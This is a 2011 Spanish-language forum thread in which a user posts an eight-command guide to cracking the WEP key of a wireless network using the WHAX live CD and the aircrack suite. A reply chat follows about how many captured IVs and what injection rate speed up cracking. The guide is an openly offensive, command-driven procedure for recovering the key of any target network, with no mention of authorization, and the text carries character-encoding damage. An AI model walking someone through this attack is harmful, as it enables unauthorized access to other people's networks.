Rompiendo el cifrado WEP en 8 comandos [ipw2200]

Publicado por D3M0N, 18 de Febrero de 2011, 10:33:51 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

D3M0N

Existen míltiples manuales para romper la seguridad de las redes Wireless cuando se utiliza el protocolo WEP, en este caso, ajustamos el entorno a las siguientes condiciones, distribuciín livecd WHAX, portatil Dell Latitude D610.
Dentro de la distribuciín tenemos todas las utilidades que vamos a necesitar.

Comenzamos..

Indicamos a la BIOS el inicio desde cdrom.

Tecleamos:
linux load=ipw2200


De esta forma se cargarí¡ el entorno necesario para hacer funcionar la tarjeta wifi.
...cuando se nos presenta la pantalla que nos habla de la configuraciín del entorno grí¡fico X, y nos indica la password del usuario root, indicamos:

login:root
passwd:toor


y a continuaciín tecleamos..

startx



Una vez iniciado el entorno grí¡fico, si no carga correctamente las X, habrí¡ que usar xconf, el entorno grí¡fico no es necesario, así­ que podrí­amos evitarnos este segundo paso e ir directamente al tercero.
Mediante el mení de navegaciín de WHAX, accedemos a una consola "Xterm" y tecleamos..

airmon.sh start eth0



airodump eth0 pruebas 0 1



(Apuntamos el nombre de la red (ESSID) y el canal (channel) a la que queremos acceder)
iwconfig eth0 mode monitor channel (canal) essid (essid)


iwconfig eth0 mode monitor channel (canal) essid (essid)


airmon.sh start eth0 (canal)


airodump eth0 (essid) (canal) 1



En este momento comienza la captura de paquetes, cuanto mayor sea el nímero de IVS mayor la posibilidad de obtener la clave, en nuestro caso con 240.998 IVS se obtuvo en 6 segundos. Las recomendaciones son de 1.000.000 de IVS para una clave WEP de 104 bits.
Una vez capturado este trí¡fico...

aircrack (essid).ivs


Y en un periodo breve de tiempo... nos mostrarí¡ la clave.

Existen diversos mítodos para acelerar la captura de trí¡fico en concreto de los IVS, pero no los explicaremos aquí­.

Notas: este procedimiento no estí¡ probado en situaciones distintas a las descritas en el documento.

El valor (essid) ha de sustituirse por el nombre de la red wifi cuya clave se quiere obtener.
El valor (canal) se ha de sustituir por el canal de la red donde se quiere capturar el trí¡fico.

diego10

240.998 IVS se obtuvo en 6 segundos y todavia explicas como hacerlo mas rapido? jaja que bueno

D3M0N

You are not allowed to view links. Register or Login
240.998 IVS se obtuvo en 6 segundos y todavia explicas como hacerlo mas rapido? jaja que bueno

teoricamente no?; porque supone; la sacas en 6 segundos pero esperaste 2 horas hasta que juntaste You are not allowed to view links. Register or Login...  :P y nadie quiere esperar; con You are not allowed to view links. Register or Login; por experiencias mí­as... es lo mí­nimo, si inyecta muy lento llegas a You are not allowed to view links. Register or Login o You are not allowed to view links. Register or Login y la crackeas en 1 minuto, si la contraseíña es de 6 dí­gitos: juanma... pero todo depende segín la red.

siempre es recomendable You are not allowed to view links. Register or Login; pero no es tan necesario; si tenemos una entrada de 120 por segundo variando a 80 con You are not allowed to view links. Register or Login se saca... si tenemos una entrada de 400 o 500 eso es mejor y ahi si; aguantas un cacho mí¡s y la crackeas con You are not allowed to view links. Register or Login..